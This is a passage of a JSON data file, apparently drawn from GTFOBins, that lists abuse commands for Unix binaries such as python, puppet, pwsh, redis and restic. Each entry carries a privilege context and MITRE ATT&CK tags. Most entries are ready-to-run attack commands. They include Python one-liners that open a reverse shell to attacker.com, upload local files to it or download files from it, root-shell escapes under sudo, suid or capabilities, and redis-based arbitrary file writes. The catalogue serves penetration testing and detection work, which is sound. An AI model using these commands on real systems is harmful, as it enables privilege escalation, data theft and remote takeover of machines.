executed.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:file-write:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"puppet apply -e 'file { \"/path/to/output-file\": content => \"DATA\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:file-write:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"puppet apply -e 'file { \"/path/to/output-file\": content => \"DATA\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:shell:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"puppet apply -e \"exec { '/bin/sh <$(tty) >$(tty) 2>$(tty)': }\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:shell:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"puppet apply -e \"exec { '/bin/sh <$(tty) >$(tty) 2>$(tty)': }\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:pwsh:file-write:0:sudo","toolId":"gtfo:pwsh","toolName":"pwsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pwsh -c '\"DATA\" | Out-File /path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pwsh/"]},{"id":"gtfo:pwsh:file-write:0:unprivileged","toolId":"gtfo:pwsh","toolName":"pwsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"pwsh -c '\"DATA\" | Out-File /path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pwsh/"]},{"id":"gtfo:pwsh:shell:0:sudo","toolId":"gtfo:pwsh","toolName":"pwsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pwsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pwsh/"]},{"id":"gtfo:pwsh:shell:0:unprivileged","toolId":"gtfo:pwsh","toolName":"pwsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pwsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pwsh/"]},{"id":"gtfo:pygmentize:file-read:0:sudo","toolId":"gtfo:pygmentize","toolName":"pygmentize","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pygmentize -l text /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pygmentize/"]},{"id":"gtfo:pygmentize:file-read:0:unprivileged","toolId":"gtfo:pygmentize","toolName":"pygmentize","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pygmentize -l text /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pygmentize/"]},{"id":"gtfo:pyright:file-read:0:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright /path/to/input-file","description":"Content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:0:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright /path/to/input-file","description":"Content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:1:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright --outputjson /path/to/input-file","description":"Content is leaked as error messages in JSON format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:1:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright --outputjson /path/to/input-file","description":"Content is leaked as error messages in JSON format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:2:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright -w /path/to/input-dir/","description":"Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:2:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright -w /path/to/input-dir/","description":"Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:python:download:0:sudo","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:download:0:suid","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:download:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-read:0:sudo","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-read:0:suid","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-read:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-write:0:sudo","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-write:0:suid","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-write:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:library-load:0:capabilities","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:library-load:0:sudo","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:library-load:0:suid","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:library-load:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:reverse-shell:0:sudo","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:reverse-shell:0:suid","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:reverse-shell:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:shell:0:capabilities","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:shell:0:sudo","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:shell:0:suid","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:shell:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:0:sudo","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:0:suid","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:1:sudo","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:1:suid","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:1:unprivileged","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:qpdf:file-read:0:sudo","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/qpdf/"]},{"id":"gtfo:qpdf:file-read:0:suid","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/qpdf/"]},{"id":"gtfo:qpdf:file-read:0:unprivileged","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/qpdf/"]},{"id":"gtfo:rake:file-read:0:sudo","toolId":"gtfo:rake","toolName":"rake","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rake -f /path/to/input-file","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rake/"]},{"id":"gtfo:rake:file-read:0:unprivileged","toolId":"gtfo:rake","toolName":"rake","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rake -f /path/to/input-file","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rake/"]},{"id":"gtfo:rake:inherit:0:sudo","toolId":"gtfo:rake","toolName":"rake","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"rake -p '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rake/"]},{"id":"gtfo:rake:inherit:0:unprivileged","toolId":"gtfo:rake","toolName":"rake","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"rake -p '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rake/"]},{"id":"gtfo:ranger:shell:0:sudo","toolId":"gtfo:ranger","toolName":"ranger","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ranger\nS","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ranger/"]},{"id":"gtfo:ranger:shell:0:unprivileged","toolId":"gtfo:ranger","toolName":"ranger","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ranger\nS","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ranger/"]},{"id":"gtfo:rc:shell:0:sudo","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rc/"]},{"id":"gtfo:rc:shell:0:suid","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rc/"]},{"id":"gtfo:rc:shell:0:unprivileged","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rc/"]},{"id":"gtfo:readelf:file-read:0:sudo","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/readelf/"]},{"id":"gtfo:readelf:file-read:0:suid","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/readelf/"]},{"id":"gtfo:readelf:file-read:0:unprivileged","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/readelf/"]},{"id":"gtfo:redcarpet:file-read:0:sudo","toolId":"gtfo:redcarpet","toolName":"redcarpet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"redcarpet /path/to/input-file","description":"The file is actually parsed as a Markdown file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/redcarpet/"]},{"id":"gtfo:redcarpet:file-read:0:unprivileged","toolId":"gtfo:redcarpet","toolName":"redcarpet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"redcarpet /path/to/input-file","description":"The file is actually parsed as a Markdown file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/redcarpet/"]},{"id":"gtfo:redis:file-write:0:sudo","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/redis/"]},{"id":"gtfo:redis:file-write:0:suid","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/redis/"]},{"id":"gtfo:redis:file-write:0:unprivileged","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/redis/"]},{"id":"gtfo:restic:command:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:1:sudo","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:1:suid","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:1:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -p -c \"/bin/sh -p 0<&2 1<&2\"' restic 